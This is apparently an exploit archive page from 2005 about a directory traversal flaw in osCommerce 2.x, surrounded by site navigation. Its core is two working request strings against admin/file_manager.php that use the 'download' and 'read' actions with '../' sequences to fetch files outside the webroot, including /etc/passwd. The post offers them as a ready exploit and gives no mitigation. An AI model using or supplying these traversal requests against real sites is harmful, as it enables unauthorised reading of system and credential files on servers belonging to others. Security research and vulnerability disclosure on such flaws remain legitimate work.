osCommerce2.txt

osCommerce2.txt: Posted Mar 24, 2005; Authored by Megasky; osCommerce versions 2.x suffer from a directory traversal attack that allows for access to directories outside of the webroot. Besides using the download action, the read action is also usable.; tags | exploit; SHA-256 | 9255249c2dea8f5cc5f61abe23ffc78055c3336e0b338f722ef32a8fb85d6493; Download | Favorite | View

osCommerce2.txt



there is allready a post on this that have 
file_manager.php?action=download&filename=../../../../../../etc/passwd 
 
sometime the action=download doesn't work , so i tried action=read
/admin/file_manager.php?action=read&filename=../../../../

Top Authors In Last 30 Days

Red Hat 217 files
Ubuntu 101 files
Debian 21 files
indoushka 18 files
Google Security Research 15 files
Gentoo 14 files
Mirabbas Agalarov 12 files
CraCkEr 9 files
Apple 9 files
Ivan Fratric 8 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,753)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,783)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,311)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,633)
UNIX (9,237)
UnixWare (186)
Windows (6,555)
Other

osCommerce2.txt

osCommerce2.txt

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

osCommerce2.txt

Share This

osCommerce2.txt

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems